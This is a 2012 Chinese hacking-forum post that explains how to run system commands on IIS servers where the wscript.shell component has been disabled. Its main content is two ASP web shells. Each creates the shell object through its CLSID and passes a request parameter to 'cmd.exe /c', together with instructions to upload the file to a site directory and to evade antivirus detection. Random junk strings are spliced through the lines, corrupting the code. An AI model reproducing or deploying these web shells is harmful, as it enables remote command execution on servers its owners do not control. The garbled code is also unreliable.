中国网络渗透测试联盟

标题: 没有wscript.shell组件提权方法 [打印本页]

作者: admin 时间: 2012-10-21 09:08
标题: 没有wscript.shell组件提权方法

可能有很多人，看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。2 _, t; d5 f; J' d4 T3 d
一般当闭上面组件时，你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。; T. d, K- G# {' c, a* O
要想让运行命令可以试试这种方法，成功率为五五之数。
6 a6 [" F* S! r( F/ x F) m
把下面代码复制： p( [* }+ ? r) H
<%# y9 B9 k) H& ]3 ^" I, c
end if
: m) Q0 e" O# B8 K& m
response.write(”")8 F4 M. K4 n# b1 `* Z" M
On Error Resume ' s$ K( g# J0 e6 u. o: F* c$ v4 w- J
Next! K7 U/ }# c- z) f G
response.write oScriptlhn.exec(”cmd.exe /c” & ; m- y' v( W; N$ h) `- G
request(”c”)).stdout.readall
6 b7 R" i" c& P9 @0 G
response.write(”")6 c% }& ^- n) h$ C1 h! U$ {. V( z
response.write(”")2 P X2 N8 l+ h X6 p/ A$ e
response.write(”
2 X# f0 r) Q1 y( K" A$ Y
“)$ q- W8 Q/ h. V( [& ~6 p
response.write(”")
: j" d7 _4 H/ b
%>
5 }. Z% C# m: i+ k- G. R6 r D: j$ K
保存为一个asp文件，然后传到网站目录上去
6 S. i2 C2 C/ R8 L6 R2 \# l
运行的时候可能会出现两个问题，第一是运行了为什么运行不了命令，这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
7 b! R. O" q1 t( {. r7 D
我用此成功运行过cacls命令。7 D6 g+ z* i; |% B/ Z
第二那就是运行时出错，可能限制某些代码执行
5 ^4 n( y8 q4 g& X; n' J( G- g
无wscript.shell组件提权又一个方法
3 S- k7 _& P, K3 \+ i
<object runat=server id=oScriptlhn scope=page : ~2 h# g5 h- J& X2 m$ w" S
5 o u H5 b# r( t
classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>, B7 g$ {& }1 _; E. B" E( K
<%if err then%>
+ g: u. V& o8 |- ]
<object runat=server id=oScriptlhn scope=page
0 H, o( {/ o/ {* Z) c5 ]* X1 t
: B# l+ d+ \+ l1 b k6 a' n6 |
classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>
6 ?+ ^6 n* l4 r3 c( Y
<% 4 O+ `7 e# H7 [
end if
0 A" Q% m. [% T* t9 W+ p. M
response.write(”<textarea readonly cols=80
6 S2 Y$ e8 N$ _' I: L) X( y' \
! j$ h1 w3 B; l7 c8 j, p
rows=20>”)
& X3 o/ w6 Q% A* ~8 t* w" H
On Error Resume Next
' F4 x% m, ~6 Z' G7 f6 a( l
response.write + Q* z8 s# S. @0 W$ y- V) h( {* ]
! S8 w) h5 C4 s& [" P
oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall7 g2 Q$ F4 R3 P, k
response.write(”</textarea>”)
8 U* f% \* K6 {" P
response.write(”<form
( Z, ?- D1 l- v( [* G; n, a5 H
5 L" `4 _: E, x& R& D) ~" h7 x
method=’post’>”)
! L! A* a) Y9 O. {8 `9 f: E7 \3 L
response.write(”<input type=text name=’c'
" m N8 k7 V4 k* C, |9 K W8 a
5 i& D; H' T* L: M$ o2 K
size=60><br>”)
( J: t2 O# F" E) e7 X0 }
response.write(”<input type=submit $ l. r1 ~7 z6 \& Y
- |: t3 u% v B
value=’执行’></form>”)
3 t7 t7 q/ M/ n" {* Y/ h
%>
# w- j9 A+ H! n8 B
保存为ASP，此代码可能被杀，请注意免杀。
" v. D/ ?; ^7 J a
原理：有些人把wscript.shell改名了,但是clsid没有变，所以调用这个clsid就等于调用ws组建
& m$ Y1 x5 r, C5 N+ F

复制代码

欢迎光临中国网络渗透测试联盟 (https://cobjon.com/)